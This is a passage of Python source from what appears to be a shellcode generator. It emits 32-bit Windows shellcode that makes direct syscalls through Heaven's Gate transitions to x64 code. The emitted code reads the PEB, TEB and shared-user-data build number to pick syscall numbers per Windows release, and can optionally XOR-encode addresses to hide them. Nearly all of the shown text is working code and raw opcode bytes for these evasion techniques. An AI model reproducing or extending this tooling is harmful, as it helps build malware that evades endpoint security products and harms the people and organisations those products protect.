(\r\n\t\t\t\tsemicolonPrefix\r\n\t\t\t\t+ mag + fieldType + res\r\n\t\t\t\t+ \" \"\r\n\t\t\t\t+ blu + fieldName + res\r\n\t\t\t\t+ \" = \"\r\n\t\t\t\t+ yel + fieldValue + res\r\n\t\t\t)\r\n\t\telse:\r\n\t\t\tline = semicolonPrefix + mag + fieldName + res + \" = \" + yel + fieldValue + res\r\n\r\n\t\tif fieldComment:\r\n\t\t\tline += \" \" + yel + \"(\" + str(fieldComment) + \")\" + res\r\n\r\n\t\tlines.append(line)\r\n\r\n\treturn \"\\n\".join(lines) + \"\\n\"\r\n\r\ndef sanitizeAdditionalComment(paramType, paramName, additionalComment):\r\n\tif additionalComment is None:\r\n\t\treturn \"\"\r\n\r\n\ttext = str(additionalComment).strip()\r\n\tif not text:\r\n\t\treturn \"\"\r\n\r\n\ttypeNamePair = paramType + \" \" + paramName\r\n\r\n\t# Case 1: full repetition like:\r\n\t# \"ACCESS_MASK DesiredAccess ...\"\r\n\ttext = stripLeadingTextCaseInsensitive(text, typeNamePair)\r\n\r\n\t# Case 2: repeated param name like:\r\n\t# \"DesiredAccess (THREAD_ALL_ACCESS)\"\r\n\ttext = stripLeadingTextCaseInsensitive(text, paramName)\r\n\r\n\t# Case 3: pointer boilerplate like:\r\n\t# \"Pointer to HANDLE ThreadHandle (dummy pointer)\"\r\n\t# \"Pointer to OBJECT_ATTRIBUTES ObjectAttributes (NULL, defaulted)\"\r\n\tif paramType.upper().startswith(\"P\") and len(paramType) > 1:\r\n\t\tpointeeType = paramType[1:]\r\n\r\n\t\ttext = stripLeadingTextCaseInsensitive(text, \"Pointer to \" + pointeeType + \" \" + paramName)\r\n\t\ttext = stripLeadingTextCaseInsensitive(text, \"Pointer to \" + paramName)\r\n\t\ttext = stripLeadingTextCaseInsensitive(text, \"Pointer to \" + pointeeType)\r\n\r\n\t# Case 4: sometimes comments repeat type only\r\n\ttext = stripLeadingTextCaseInsensitive(text, paramType)\r\n\r\n\t# Clean up ugly leftovers\r\n\ttext = text.strip()\r\n\tif text.startswith(\",\"):\r\n\t\ttext = text[1:].lstrip()\r\n\tif text.startswith(\"-\"):\r\n\t\ttext = text[1:].lstrip()\r\n\r\n\treturn text\r\n\r\ndef buildAlignedPushLine(pushValue, commentText, commentColumn=24):\r\n\tline = \"push \" + pushValue\r\n\r\n\tif commentText:\r\n\t\tpadding = max(1, commentColumn - len(pushValue))\r\n\t\tline += (\" \" * padding) + \"; \" + commentText\r\n\r\n\treturn line\r\n\r\n\r\ndef buildStructLines(structureRef, syscallEntry, commentColumn=24):\r\n\tif not structureRef:\r\n\t\treturn \"\"\r\n\r\n\tstructMap = syscallEntry.get(\"structures\", {})\r\n\tif not isinstance(structMap, dict):\r\n\t\treturn \"\"\r\n\r\n\tstructDef = structMap.get(structureRef)\r\n\tif not isinstance(structDef, dict):\r\n\t\treturn \"\"\r\n\r\n\tfields = structDef.get(\"fields\", [])\r\n\tif not isinstance(fields, list) or not fields:\r\n\t\treturn \"\"\r\n\r\n\tlines = []\r\n\tsemicolonPrefix = \" \" * (5 + commentColumn) + \"; \"\r\n\r\n\tfor field in fields:\r\n\t\tfieldName = str(field.get(\"fieldName\", \"UNKNOWN\"))\r\n\t\tfieldValue = str(field.get(\"fieldValue\", \"UNKNOWN\"))\r\n\t\tfieldComment = field.get(\"fieldComment\")\r\n\r\n\t\tline = semicolonPrefix + mag + fieldName + res + \" = \" + yel + fieldValue + res\r\n\r\n\t\tif fieldComment:\r\n\t\t\tline += \" \" + yel + \"(\" + str(fieldComment) + \")\" + res\r\n\r\n\t\tlines.append(line)\r\n\r\n\treturn \"\\n\".join(lines) + \"\\n\"\r\ndef buildSampleValsComment(paramType, paramName, additionalComment):\r\n\tcleanedComment = sanitizeAdditionalComment(paramType, paramName, additionalComment)\r\n\r\n\tbaseComment = cya + paramType + res + \" \" + blu + paramName + res\r\n\r\n\tif cleanedComment:\r\n\t\treturn baseComment + \" \" + yel + cleanedComment + res\r\n\r\n\treturn baseComment\r\n\r\ndef buildSyscall(print_to_file=False):\r\n\r\n\t# osChoices = [\"4A62\",\"3AD7\", \"47BA\",\"1DB0\", \"55F0\", \"4A64\"]\r\n\r\n\t# syscallChoices=[\"NtAllocateVirtualMemory\", \"NtCreateKey\", \"NtReplaceKey\",\"NtSetContextThread\", \"NtSetValueKey\"]\r\n\tcom1=com2=com3=com4=com5=com6=com64=com9=comGetPC=com11=com10=\"\\n\"\r\n\tcom8=com12=com13=com14=ws=xwin7L1=xwin7L2=xwin7L3=xwin7L4=xwin7L5=xwin7L6=xwin7L7=xwin7L7=comx64Ext1=comx64Ext2=comx64Ext3=comx64Ext4=comx64Ext5=comx64Ext6=comx64Ext7=comx64Ext8=comx64Ext9=comx64Ext10=comx64Ext11=comx64Ext12=comx64Ext13=comx64Ext14=comx64Ext15=comx64Ext16=comx64Ext17=comUSD=comUSDxor= com15=com16= com17=com18= com19=com20=com21=comhg=comhg86=comhg64=\"\"\r\n\r\n\tif sh.show_comments:\r\n\t\tcom1=\"\\t\\t; \"+mag+\"Syscall Function\"+res+\"\\n\"\r\n\t\tcom2=\"\\t\\t\\t; \"+gre+\"Windows 10/11 Syscall\"+res+\"\\n\"\r\n\t\tcom3=\"\\t\\t\\t; \"+gre+\"Windows 7 Syscall\"+res+\"\\n\"\r\n\t\tcom4=\"\\t\\t; \"+yel+\"Push 0x33 selector for 64-bit\"+res+\"\\n\"\r\n\t\tcom5=\"\\t\\t; \"+yel+\"Create return address for leaving kernel-mode\"+res+\"\\n\"\r\n\t\tcom6=\"\\t\\t; \"+yel+\"Create destination for Heaven's gate\"+res+\"\\n\"\r\n\t\tcom64=\"\\t\\t\\t; \"+mag+\"Invoke Heaven's gate\"+yel+\"--transition to x64 code\"+res+\"\\n\"\r\n\t\tcom86=\"\\t\\t\\t; \"+mag+\"Invoke Heaven's gate\"+yel+\"--transition to x86 code\"+res+\"\\n\"\r\n\t\tcomhg=\"\\t\\t\\t; \"+mag+\"Invoke Heaven's gate\"+res\r\n\t\tcomhg86=\"\\t\\t\\t; \"+mag+\"Invoke Heaven's gate\"+yel+\" -- go x86\"+res\r\n\t\tcomhg64=\"\\t\\t\\t; \"+mag+\"Invoke Heaven's gate\"+yel+\" -- go x64\"+res\r\n\t\t\r\n\r\n\r\n\t\tcom8=\"\\t; \"+yel+\"x64 code as bytes, leading to \"+mag+\"syscall\"+res+\"\"\r\n\t\tcom10=\"\\n\\t\\t\\t; \"+yel+\"x64 code: \"+cya+\"jmp qword ptr [r15+0F8h]\"+res+\"\\n\"\r\n\t\tcom12=\"\\t; \"+yel+\"Formatted for \"+blu+\"VisualStudio inline Assembly\"+res\r\n\t\tcom13=\"\\t; \"+cya+\"jmp qword ptr [r15+0F8h]\"+res+\"\"\r\n\t\tcom14=\"\\t; \"+yel+\"x64 code will enter kernel-mode and then return\"+res+\"\"\r\n\t\tcom15=res+\"\\t # \"+yel+\"Save 32-bit registers\"+res\r\n\t\tcom16=res+\"\\t # \"+yel+\"into WOW64_CONTEXT\"+res\r\n\t\tcom17=res+\"\\t # \"+yel+\"Save x86 EIP\"+res\r\n\t\tcom18=res+\"\\t # \"+yel+\"Save x86 ESP\"+res\r\n\t\tcom19=res+\"\\t # \"+yel+\"Save x86 EFlags\"+res\r\n\t\tcom20=res+\"\\t # \"+yel+\"Pointer to syscall args\"+res\r\n\t\tcom21=res+\"\\t # \"+yel+\"Get TurboThunk, if needed\"+res\r\n\r\n\r\n\r\n\r\n\r\n\r\n\t\tcom9=\"\\t; \"+yel+\"Return from kernel-mode, back to 32-bit\"+res+\"\\n\"\r\n\t\tcomGetPC=\"\\t\\t; \"+yel+\"GetPC\"+res+\"\\n\"\r\n\t\tws=res+\"; \"+cya\r\n\t\tcom11=\"\\n\\t\\t\\t; \"+cya+\"\"\"mov r8d,dword ptr [esp] \r\n\t\t\t{}mov dword ptr [r13+0BCh],r8d\r\n\t\t\t{}add esp,0x4\r\n\t\t\t{}mov dword ptr [r13+0C8h],esp\r\n\t\t\t{}mov rsp,qword ptr [r12+1480h]\r\n\t\t\t{}and qword ptr [r12+1480h],0\r\n\t\t\t{}mov r11d,edx\r\n\t\t\t{}jmp qword ptr [r15+rcx*8]{}\r\n\r\n\t\t\t\"\"\".format(ws,ws,ws,ws,ws,ws,ws,res)\r\n\t\tcom11Ex=\"\\n\\t\\t\\t; \"+cya+\"\"\"xchg rsp,r14\r\n\t\t\t{}mov r8d,dword ptr [r14]\r\n\t\t\t{}add r14,4\r\n\t\t\t{}mov dword ptr [r13+3Ch],r8d{}\r\n\t\t\t{}mov dword ptr [r13+48h],r14d{}\r\n\t\t\t{}sub r14,4\r\n\t\t\t{}lea r11,[r14+4] {}\r\n\t\t\t{}mov dword ptr [r13+20h],edi{}\r\n\t\t\t{}mov dword ptr [r13+24h],esi{}\r\n\t\t\t{}mov dword ptr [r13+28h],ebx\r\n\t\t\t{}mov dword ptr [r13+38h],ebp\r\n\t\t\t{}pushfq \r\n\t\t\t{}pop r8 {}\r\n\t\t\t{}mov dword ptr [r13+44h],r8d\r\n\t\t\t{}mov ecx,eax\r\n\t\t\t{}shr ecx,10h {}\r\n\t\t\t{}jmp qword ptr [r15+rcx*8]{}\r\n\t\t\t\"\"\".format(ws,ws,ws,com17, ws,com18,ws,ws,com20,ws,com15,ws, com16,ws,ws,ws,ws,com19,ws,ws,ws,com21,ws,res,ws,ws,ws,ws)\r\n\r\n\r\n\r\n\t\tcomUSD=\"\\t; \" +cya+\"User_Shared_Data:\"+yel+\" OSBuild \"+res\r\n\t\tcomUSDxor= \"\\t\\t; \" +gre+\"XOR result = 0x7ffe0260,\"+res\r\n\t\txwin7L1=\"; \"+cya+\"mov r8d,dword ptr [esp]\"+res\r\n\t\txwin7L2=\"; \"+cya+\"mov dword ptr [r13+0BCh],r8df\"+res\r\n\t\txwin7L3=\"; \"+cya+\"add esp,0x4\"+res\r\n\t\txwin7L4=\"; \"+cya+\"mov dword ptr [r13+0C8h],esp\"+res\r\n\t\txwin7L5=\"; \"+cya+\"mov rsp,qword ptr [r12+1480h]\"+res\r\n\t\txwin7L6=\"; \"+cya+\"and qword ptr [r12+1480h],0\"+res\r\n\t\txwin7L7=\"; \"+cya+\"mov r11d,edx\"+res\r\n\t\txwin7L8=\"; \"+cya+\"jmp qword ptr [r15+rcx*8]\"+res\r\n\r\n\r\n\t\t# com16=res+\"\\t # \"+yel+\"into WOW64_CONTEXT\"+res\r\n\t\t# com17=res+\"\\t # \"+yel+\"Save x86 EIP\"+res\r\n\t\t# com18=res+\"\\t # \"+yel+\"Save x86 ESP\"+res\r\n\t\t# com19=res+\"\\t # \"+yel+\"Save x86 EFlags\"+res\r\n\t\t# com20=res+\"\\t # \"+yel+\"Pointer to syscall args\"+res\r\n\t\t# com21=res+\"\\t # \"+yel+\"Get TurboThunk, if needed\"+res\r\n\r\n\t\tcomx64Ext1=\"; \"+cya+\"xchg rsp,r14\"+res\r\n\t\tcomx64Ext2=\"; \"+cya+\"mov r8d,dword ptr [r14]\"+res\r\n\t\tcomx64Ext3=\"; \"+cya+\"add r14,4\"+res\r\n\t\tcomx64Ext4=\"; \"+cya+\"mov dword ptr [r13+3Ch],r8d {}\".format(com17)+res\r\n\t\tcomx64Ext5=\"; \"+cya+\"mov dword ptr [r13+48h],r14d {}\".format(com18)+res\r\n\t\tcomx64Ext6=\"; \"+cya+\"sub r14,4\"+res\r\n\t\tcomx64Ext7=\"; \"+cya+\"lea r11,[r14+4] {}\".format(\"\\t\"+com20)+res\r\n\t\tcomx64Ext8=\"; \"+cya+\"mov dword ptr [r13+20h],edi {}\".format(com15)+res\r\n\t\tcomx64Ext9=\"; \"+cya+\"mov dword ptr [r13+24h],esi {}\".format(com16)+res\r\n\t\tcomx64Ext10=\"; \"+cya+\"mov dword ptr [r13+28h],ebx\"+res\r\n\t\tcomx64Ext11=\"; \"+cya+\"mov dword ptr [r13+38h],ebp\"+res\r\n\t\tcomx64Ext12=\"; \"+cya+\"pushfq\"+res\r\n\t\tcomx64Ext13=\"; \"+cya+\"pop r8 {}\".format(\"\\t\\t\"+com19)+res\r\n\t\tcomx64Ext14=\"; \"+cya+\"mov dword ptr [r13+44h],r8d\"+res\r\n\t\tcomx64Ext15=\"; \"+cya+\"mov ecx,eax\"+res\r\n\t\tcomx64Ext16=\"; \"+cya+\"shr ecx,10h {}\".format(\"\\t\\t\"+com21)+res\r\n\t\tcomx64Ext17=\"; \"+cya+\"jmp qword ptr [r15+rcx*8]\"+res\r\n\t\t\r\n\t\tcomr12=\"\\t\\t; \"+gre+\"x64: \"+cya+\"mov ebx,dword ptr [r12]\"+res\r\n\t\tcomr12TEB=\"\\t\\t; \"+yel+\"Get TEB from TEB64\"+res\r\n\r\n\r\n\tgetPebr12_inline=\"\"\"_emit 0x41 {}\r\n_emit 0x8b {}\r\n_emit 0x1c\r\n_emit 0x24\r\n\r\n\"\"\".format(comr12,comr12TEB)\r\n\r\n\tgetPebr12_nasm=\"\"\"db 0x41,0x8b,0x1c,0x24{}\t\r\n\t\t{}\r\n\"\"\".format(comr12[1:],\"\",comr12TEB)\r\n\r\n\tif sh.comp()==\"nasm\":\r\n\t\tgetPebr12=getPebr12_nasm\r\n\telif sh.comp()==\"inlineVS\":\r\n\t\tgetPebr12=getPebr12_inline\r\n\r\n\tif len(sh.osChoices2)==0 or len(sh.list_of_syscalls)==0:\r\n\t\tprint(red+\"\\tInadequate number of syscalls selections or Windows releases to continue!\"+res)\r\n\t\treturn\r\n\tosChoices=sh.osChoices2\r\n\tsyscallChoices=sh.list_of_syscalls\r\n\trevSyscallChoices=syscallChoices.copy()\r\n\trevSyscallChoices.reverse()\r\n\tdictSyscallEDILocations={}\r\n\tlistOfSyscallsAdded = [] # this allows only one per each, in order given!\r\n\tt=0\r\n\tfor each in syscallChoices:\r\n\t\tif each not in dictSyscallEDILocations:\r\n\t\t\tdictSyscallEDILocations[each]=t\r\n\t\tt+=1\r\n\t# print (\"syscallChoices\")\r\n\t# print (syscallChoices)\r\n\t# print (red, \"revSyscallChoices\",res)\r\n\t# print (revSyscallChoices)\r\n\t# print (\"dict\")\r\n\t# print (dictSyscallEDILocations)\r\n\t# print (\"end\")\r\n\r\n\t#####\r\n\t# 21h2 build 22000 55F0\r\n\r\n\t# print (syscallChoices)\r\n\t# print (\"revSyscallChoices\", revSyscallChoices)\r\n\tendInitializer=\"\"\"\r\nsaveSyscallArray:\r\npush eax\r\nmov edi, esp\r\nadd edi, 0x4\r\nmov esp, ecx\r\n\r\n\"\"\"\r\n\tif isWin7() and isWin1011() and not sh.user12Teb:\r\n\t\tinitializerStart=\"\"\"\r\nmov eax, fs:[0x30]\r\nmov ebx, [eax+0xac]\r\nmov eax, [eax+0xa4]\r\nmov ecx, esp\r\nsub esp, 0x1000\r\n\r\n\"\"\"\r\n\telif isWin7() and isWin1011() and sh.user12Teb:\r\n\t\tinitializerStart=\"\"\"push 0x33\r\ncall GetPC1\r\nGetPC1:\r\nadd [esp], 5 \r\nretf{}\r\n\r\n\"\"\".format(comhg64)\r\n\t\tinitializerStart+=getPebr12\r\n\t\tinitializerStart+=\"\"\"push 0x23\r\ncall GetPC2\r\nGetPC2:\r\nmov [esp+4], 0x23\r\nadd [esp], 0xa\r\nretf{}\r\n \r\nmov eax, [ebx+0x30]\r\nmov ebx, [eax+0xac]\r\nmov eax, [eax+0xa4]\r\nmov ecx, esp\r\nsub esp, 0x1000\r\n\r\n\"\"\".format(comhg86)\r\n\r\n\telse:\r\n\t\tif (isWin7() and not sh.user12Teb) or (isWin1011() and not sh.useSharedData and not sh.user12Teb):\r\n\t\t\tinitializerStart=\"\"\"mov ebx, fs:[0x30]\r\nmov ebx, [ebx+0xac]\r\nmov ecx, esp\r\nsub esp, 0x1000\r\n\r\n\"\"\" \r\n\t\telif (isWin7() or (isWin1011()) and sh.user12Teb):\r\n\r\n\t\t\tinitializerStart=\"\"\"push 0x33\r\ncall GetPC1\r\nGetPC1:\r\nadd [esp], 5 \r\nretf{}\r\n\r\n\"\"\".format(comhg64)\r\n\t\t\tinitializerStart+=getPebr12\r\n\t\t\tinitializerStart+=\"\"\"push 0x23\r\ncall GetPC2\r\nGetPC2:\r\nmov [esp+4], 0x23\r\nadd [esp], 0xa\r\nretf {}\r\n\r\nmov ebx, [ebx+0x30]\r\nmov ebx, [ebx+0xac]\r\nmov ecx, esp\r\nsub esp, 0x1000\r\n\r\n\"\"\".format(comhg86)\r\n\t\telse:\r\n\t\t\tinitializerStart=\"\"\"mov ebx,0x7ffe0260 {}\r\nmov ebx, [ebx]\r\nmov ecx, esp\r\nsub esp, 0x1000\r\n\r\n\"\"\".format(comUSD)\r\n\t\t\tif sh.encodeUSD and not sh.addUSD:\r\n\t\t\t\tinitializerStart=\"\"\"mov ebx,{} \r\nmov edx, {} \r\nxor ebx, edx {}\r\nmov ebx, [ebx] {}\r\nmov ecx, esp\r\nsub esp, 0x1000\r\n\r\n\"\"\".format(hex(0x7ffe0260 ^sh.encodeUSDKey), hex(sh.encodeUSDKey), comUSDxor,\"\\t\" +comUSD)\r\n\r\n\t\t\tif sh.encodeUSD and sh.addUSD:\r\n\t\t\t\tinitializerStart=\"\"\"mov ebx,{} \r\nmov edx, {} \r\nadd ebx, {}\r\nxor ebx, edx {}\r\nmov ebx, [ebx] {}\r\nmov ecx, esp\r\nsub esp, 0x1000\r\n\r\n\"\"\".format(hex((0x7ffe0260 ^sh.encodeUSDKey)-sh.addUSDVal), hex(sh.encodeUSDKey),hex(sh.addUSDVal), comUSDxor,\"\\t\" +comUSD)\r\n\t\t\tif not sh.encodeUSD and sh.addUSD:\r\n\t\t\t\tinitializerStart=\"\"\"mov ebx,{} \r\nadd ebx, {}\r\nmov ebx, [ebx] {}\r\nmov ecx, esp\r\nsub esp, 0x1000\r\n\r\n\"\"\".format(hex(0x7ffe0260 -sh.addUSDVal),hex(sh.addUSDVal), \"\\t\" +comUSD)\r\n\r\n\r\n\t\tendInitializer=\"\"\"\r\nsaveSyscallArray:\r\nmov edi, esp\r\nmov esp, ecx\r\n\r\n\"\"\"\t\r\n\tcheckOsRelease=generateInitializer=generateSyscallParams=\"\"\r\n\tsaveSyscallArray=\"\"\"push edi\r\n\r\n\t\"\"\"\r\n\t\r\n\tbasicWin7to11Syscall=\"\\nourSyscall:\"+com1\r\n\tbasicWin7to11Syscall+=\"\"\"cmp dword ptr [edi-0x4],0xa\r\njne win7\r\n\r\n\"\"\"\r\n\r\n\tbasicWin7to11Syscall+=\"\\nwin10:\"+com2\r\n\tbasicWin7to11Syscall+=\"\"\"call dword ptr fs:[0xc0]\r\nret \r\n\"\"\"\r\n\tbasicWin7to11Syscall+=\"\\nwin7:\"+com3\r\n\tbasicWin7to11Syscall+=\"\"\"xor ecx, ecx\r\nlea edx, [esp+4]\r\ncall dword ptr fs:[0xc0]\r\nadd esp, 4\r\nret\"\"\"\r\n\tourSyscallx64Win71011Prologue=\"\\nourSyscall:\"+com1\r\n\tourSyscallx64Win71011Prologue+=\"\"\"cmp dword ptr [edi-0x4],0xa\r\njne win7\r\n\r\n\"\"\"\r\n\tourSyscallx64Win71011Prologue+=\"win10:\" +com2\r\n\t\r\n\r\n\tourSyscallx64Win1011Basic=\"\"\"call buildDestRet\r\nbuildDestRet:\r\nadd [esp], 0x17\"\"\"+com5\r\n\r\n\tourSyscallx64Win1011=\"push 0x33\"+com4\r\n\tourSyscallx64Win1011+=\"call nextRetf\"+comGetPC\r\n\tourSyscallx64Win1011+=\"\"\"nextRetf:\r\nadd [esp], 5\"\"\"+com6\r\n\tourSyscallx64Win1011+=\"retf\"+com64\r\n\r\n\t# ourSyscallx64Win71011Prologue=\"win10:\" +com2\r\n\tourSyscallx64Win1011Ex=\"push 0x33\"+com4\r\n\tourSyscallx64Win1011Ex+=\"call nextRetf\"+comGetPC\r\n\tourSyscallx64Win1011Ex+=\"\"\"nextRetf:\r\nadd [esp], 5\"\"\"+com6\r\n\tourSyscallx64Win1011Ex+=\"retf\"+com64\r\n\r\n\tx64Win10=\"db 0x41,0xff,0xa7,0xf8,0x00,0x00,0x00 \"+com8+com10\r\n\t# sh.setComp(\"inlineVS\")\r\n\tx64Win10Inline=\"\"\"\r\n_emit 0x41 \t{}\r\n_emit 0xff \t{}\r\n_emit 0xa7 \t{}\r\n_emit 0xf8\r\n_emit 0x00 \t{}\r\n_emit 0x00\r\n_emit 0x00 \r\n\r\n\"\"\".format(com8,\"\",com12,com13)\r\n\r\n\tx64Win10Ex=\"db 0x49,0x87,0xe6,0x45,0x8b,0x06,0x49,0x83,0xc6,0x04,0x45,0x89,0x45,0x3c,0x45,0x89,0x75,0x48,0x49,\\n0x83,0xee,0x04,0x4d,0x8d,0x5e,0x04,0x41,0x89,0x7d,0x20,0x41,0x89,0x75,0x24,0x41,0x89,0x5d,0x28,0x41,\\n0x89,0x6d,0x38,0x9c,0x41,0x58,0x45,0x89,0x45,0x44,0x89,0xc1,0xc1,0xe9,0x10,0x41,0xff,0x24,0xcf\"+\"\\n\\t\\t\"+com8+com11Ex\r\n\r\n\tx64Win10ExInline=\"\"\"\r\n_emit 0x49\t{}\r\n_emit 0x87\t{}\r\n_emit 0xe6 \t\t{} \r\n_emit 0x45 \t\t{} \r\n_emit 0x8b \t\t{} \r\n_emit 0x06 \t\t{} \r\n_emit 0x49 \t\t{} \r\n_emit 0x83 \t\t{} \r\n_emit 0xc6 \t\t{} \r\n_emit 0x04 \t\t{} \r\n_emit 0x45 \t\t{} \r\n_emit 0x89 \t\t{} \r\n_emit 0x45 \t\t{} \r\n_emit 0x3c \t\t{} \r\n_emit 0x45 \t\t{} \r\n_emit 0x89 \t\t{}\r\n_emit 0x75 \t\t{}\r\n_emit 0x48 \t\t{}\r\n_emit 0x49\t\t{}\r\n_emit 0x83\r\n_emit 0xee\r\n_emit 0x04\r\n_emit 0x4d\r\n_emit 0x8d\r\n_emit 0x5e\r\n_emit 0x04\r\n_emit 0x41\r\n_emit 0x89\r\n_emit 0x7d\r\n_emit 0x20\r\n_emit 0x41\r\n_emit 0x89\r\n_emit 0x75\r\n_emit 0x24\r\n_emit 0x41\r\n_emit 0x89\r\n_emit 0x5d\r\n_emit 0x28\r\n_emit 0x41\r\n_emit 0x89\r\n_emit 0x6d\r\n_emit 0x38\r\n_emit 0x9c\r\n_emit 0x41\r\n_emit 0x58\r\n_emit 0x45\r\n_emit 0x89\r\n_emit 0x45\r\n_emit 0x44\r\n_emit 0x89\r\n_emit 0xc1\r\n_emit 0xc1\r\n_emit 0xe9\r\n_emit 0x10\r\n_emit 0x41\r\n_emit 0xff\r\n_emit 0x24\r\n_emit 0xcf \r\n\"\"\".format(com8,\"\",comx64Ext1,comx64Ext2,comx64Ext3,comx64Ext4,comx64Ext5,comx64Ext6,comx64Ext7,comx64Ext8,comx64Ext9,comx64Ext10,comx64Ext11,comx64Ext12,comx64Ext13,comx64Ext14,comx64Ext15,comx64Ext16,comx64Ext17)\r\n\r\n\tif sh.comp()==\"nasm\":\r\n\t\tourSyscallx64Win1011+=x64Win10\r\n\telif sh.comp()==\"inlineVS\":\r\n\t\tourSyscallx64Win1011+=x64Win10Inline\r\n\r\n\tif sh.comp()==\"nasm\":\r\n\t\tourSyscallx64Win1011Ex +=x64Win10Ex\r\n\telif sh.comp()==\"inlineVS\":\r\n\t\tourSyscallx64Win1011Ex +=x64Win10ExInline\r\n\r\n\r\n\tourSyscallx64Epilogue=\"ret \t\t\"+com9\r\n\tourSyscallx64Win1011+=ourSyscallx64Epilogue\r\n\t\r\n\r\n\tourSyscallx64Win7Prologue= \"\\nwin7:\"+com3\r\n\tourSyscallx64Win7= \"\"\"xor ecx, ecx\r\nlea edx, [esp+4]\r\npush 0x33\"\"\"+com4\r\n\tourSyscallx64Win7+= \"call nextRetf2\"+comGetPC\r\n\tourSyscallx64Win7+=\"\"\"nextRetf2:\r\nadd [esp], 5\"\"\"+com6\r\n\tourSyscallx64Win7+= \"retf\"+com64\r\n\tx64Win7= \"db 0x67,0x44,0x8b,0x04,0x24,0x45,0x89,0x85,0xbc,0x00,0x00,0x00,0x83,0xc4,0x04,0x41,0x89,0xa5,\\n0xc8,0x00,0x00,0x00,0x49,0x8b,0xa4,0x24,0x80,0x14,0x00,0x00,0x49,0x83,0xa4,0x24,0x80,0x14,0x00,\\n0x00,0x00,0x44,0x8b,0xda,0x41,0xff,0x24,0xcf\"+\"\\t\"+com8+com11\r\n\tx64Win7Inline=\t\"\"\"\r\n_emit 0x67\t{}\r\n_emit 0x44\t{}\r\n_emit 0x8B \t{}\r\n_emit 0x04\r\n_emit 0x24\t\t{}\r\n_emit 0x45\t\t{}\r\n_emit 0x89\t\t{}\r\n_emit 0x85\t\t{}\r\n_emit 0xBC\t\t{}\r\n_emit 0x00\t\t{}\r\n_emit 0x00\t\t{}\r\n_emit 0x00\t\t{}\r\n_emit 0x83\r\n_emit 0xc4\r\n_emit 0x04\r\n_emit 0x41\r\n_emit 0x89\r\n_emit 0xA5\r\n_emit 0xC8\r\n_emit 0x00\r\n_emit 0x00\r\n_emit 0x00\r\n_emit 0x49\r\n_emit 0x8B\r\n_emit 0xA4\r\n_emit 0x24\r\n_emit 0x80\r\n_emit 0x14\r\n_emit 0x00\r\n_emit 0x00\r\n_emit 0x49\r\n_emit 0x83\r\n_emit 0xA4\r\n_emit 0x24\r\n_emit 0x80\r\n_emit 0x14\r\n_emit 0x00\r\n_emit 0x00\r\n_emit 0x00\r\n_emit 0x44\r\n_emit 0x8B\r\n_emit 0xDA\r\n_emit 0x41\r\n_emit 0xFF\r\n_emit 0x24\r\n_emit 0xCF\"\"\".format(com8,\"\",com12,xwin7L1,xwin7L2,xwin7L3,xwin7L4,xwin7L5,xwin7L6,xwin7L7, xwin7L8)\r\n\t# sh.setComp(\"inlineVS\")\r\n\tif sh.comp()==\"nasm\":\r\n\t\tourSyscallx64Win7+=x64Win7\r\n\telif sh.comp()==\"inlineVS\":\r\n\t\tourSyscallx64Win7+=x64Win7Inline\r\n\r\n\r\n\tourSyscall=\"\"\r\n\tif isWin7() and isWin1011():\r\n\t\tif sh.style==\"fs\":\r\n\t\t\tourSyscall=basicWin7to11Syscall+\"\\n\"\r\n\t\telif sh.style==\"x64\":\r\n\t\t\tourSyscall =ourSyscallx64Win71011Prologue + ourSyscallx64Win1011Basic + ourSyscallx64Win1011 +ourSyscallx64Win7Prologue + ourSyscallx64Win7\r\n\t\telif sh.style==\"x64Ex\":\r\n\t\t\tourSyscall =ourSyscallx64Win71011Prologue + ourSyscallx64Win1011Ex +ourSyscallx64Win7Prologue + ourSyscallx64Win7\r\n\telif isWin1011():\r\n\t\tourSyscallPrologue=\"\\nourSyscall:\"+com1\r\n\t\tourSyscallBasicWin1011=\"\"\"call dword ptr fs:[0xc0]\r\nret\"\"\"\r\n\r\n\t\tif sh.style==\"fs\":\r\n\t\t\tourSyscall=ourSyscallPrologue + ourSyscallBasicWin1011+\"\\n\"\r\n\t\telif sh.style==\"x64\":\r\n\t\t\tourSyscall = ourSyscallPrologue + ourSyscallx64Win1011Basic+ ourSyscallx64Win1011\r\n\t\telif sh.style==\"x64Ex\":\r\n\t\t\tourSyscall = ourSyscallPrologue + ourSyscallx64Win1011Ex\r\n\r\n\r\n\telif isWin7():\r\n\t\tourSyscallPrologue=\"\\nourSyscall:\"+com1\r\n\t\tourSyscallBasicWin7=\"\"\"xor ecx, ecx\r\nlea edx, [esp+4]\r\ncall dword ptr fs:[0xc0]\r\nadd esp, 4\r\nret\"\"\"\t\r\n\t\tif sh.style==\"fs\":\r\n\t\t\tourSyscall=ourSyscallPrologue + ourSyscallBasicWin7+\"\\n\"\r\n\t\telif sh.style==\"x64\":\r\n\t\t\tourSyscall = ourSyscallPrologue + ourSyscallx64Win7\r\n\t\telif sh.style==\"x64Ex\":\r\n\t\t\tourSyscall = ourSyscallPrologue + ourSyscallx64Win7\r\n\tendShellcode0=\"\"\"jmp end\r\n\"\"\"\r\n\r\n\tsave=\"\"\"jne win7\r\n\twin10:\r\n\t call [fs:0xc0]\r\n\t ret \r\n \twin7:\r\n xor ecx, ecx\r\n lea edx, [esp+4]\r\n call [fs:0xc0]\r\n add esp, 4\r\n ret\"\"\"\r\n\tendShellcode1=\"\"\"\r\n\r\nend:\r\nnop\r\n\"\"\"\r\n\t##########Initialize Syscall Array\r\n\tt=1\r\n\tnumChoices=len(osChoices)\r\n\tfor osChoice in osChoices:\r\n\t\twinVersion=builds.winOSReverseLookup[osChoice]\r\n\r\n\t\thexOsChoice=builds.osChoiceToHex[osChoice]\t\t\r\n\t\tsizeOsBuild=len(hexOsChoice)\r\n\t\tosBStart=sizeOsBuild-2\r\n\t\tosBuild=hexOsChoice[osBStart:]\r\n\t\t# print (\"osBuild\", osBuild)\r\n\r\n\t\twinReleaseText=\"\"\r\n\r\n\r\n\t\tif sh.show_comments:\r\n\t\t\tif winVersion==\"Windows 10\":\r\n\t\t\t\twinReleaseText=\"; \"+mag+builds.win10ReverseLookupBackup[osChoice] +\", Win10 release\"+res\r\n\r\n\t\t\telif winVersion==\"Windows 7\":\r\n\t\t\t\twinReleaseText=\"; \"+mag+builds.win7ReverseLookup[str(int(osChoice,16))] +\" release\"+res\r\n\t\t\telif winVersion==\"Windows 11\":\r\n\t\t\t\twinReleaseText=\"; \"+mag+builds.win11ReverseLookup[str(int(osChoice,16))] +\" release\"+res\r\n\t\t\t\r\n\t\tgenerateInitializer+=\"cmp bl, 0x\"+osBuild+\"\\t\\t\" + winReleaseText + \"\\n\"\r\n\t\tif t ==(numChoices):\r\n\t\t\tgenerateInitializer+=\"jl end\" 